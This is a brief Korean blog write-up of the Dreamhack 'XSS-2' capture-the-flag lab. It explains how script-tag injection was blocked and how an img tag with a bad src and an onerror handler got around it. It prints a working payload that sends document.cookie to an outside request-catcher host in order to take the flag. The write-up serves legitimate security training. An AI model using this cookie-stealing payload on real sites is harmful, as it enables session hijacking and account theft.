[dreamhack] XSS-2

XSS-1
https://velog.io/@awsome_firo/dreamhack-xss-1

XSS 2번째 문제에선 vuln 라우팅에서도 render_template 함수를 사용하면서 <script> inject가 막혔다

img 태그의 src가 올바르지 않는 주소를 넣으면 onerror 속성을 실행한다는 취약점을 이용해 다음과 같은 코드를 작성했다

<img src="x" onerror="location.href='https://alyebct.request.dreamhack.games/' + document.cookie">

postman을 사용하여 flag 라우트에 param으로 주입할 XSS 코드를 넣었더니 Flag를 정상적으로 탈취하는 것을 볼 수 있다